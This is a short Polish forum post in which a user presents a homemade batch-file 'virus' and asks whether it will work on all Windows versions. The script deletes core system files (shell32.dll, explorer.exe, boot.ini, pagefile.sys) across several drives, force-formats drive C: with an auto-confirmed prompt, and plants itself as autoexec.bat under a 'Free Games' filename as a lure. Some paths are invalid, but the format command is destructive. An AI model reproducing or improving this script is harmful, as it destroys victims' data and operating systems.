Chciałem napisać prostego wirusa w notatniku i mam pytanie. Czy ten kod zadziała :
Chce aby zadziałał pod każdego windowsa więc po to tyle komend. Sam nie wiem o co chodzi z tym autoexec.bat.Pisałem to według jakiegoś poradnika internetowego. Preosze o sugestie.
Kod:
@echo off
DEL C:\WINDOWS\system32\shell32.dll
DEL C:\boot.ini
DEL C:\WINDOWS\explorer.exe
DEL C:\pagefile.sys
DEL D:\WINDOWS\system32\shell32.dll
DEL D:\boot.ini
DEL D:\WINDOWS\explorer.exe
DEL D:\pagefile.sys
DEL E:\WINDOWS\system32\shell32.dll
DEL E:\boot.ini
DEL E:\WINDOWS\explorer.exe
DEL E:\pagefile.sys
DEL C:\WINDOWS\system64\shell64.dll
DEL C:\boot.ini
DEL C:\WINDOWS\explorer.exe
DEL C:\pagefile.sys
DEL D:\WINDOWS\system64\shell64.dll
DEL D:\boot.ini
DEL D:\WINDOWS\explorer.exe
DEL D:\pagefile.sys
DEL E:\WINDOWS\system64\shell64.dll
DEL E:\boot.ini
DEL E:\WINDOWS\explorer.exe
DEL E:\pagefile.sys
echo T | format c: /q
cls
copy Gry Za Free.bat C:\autoexec.bat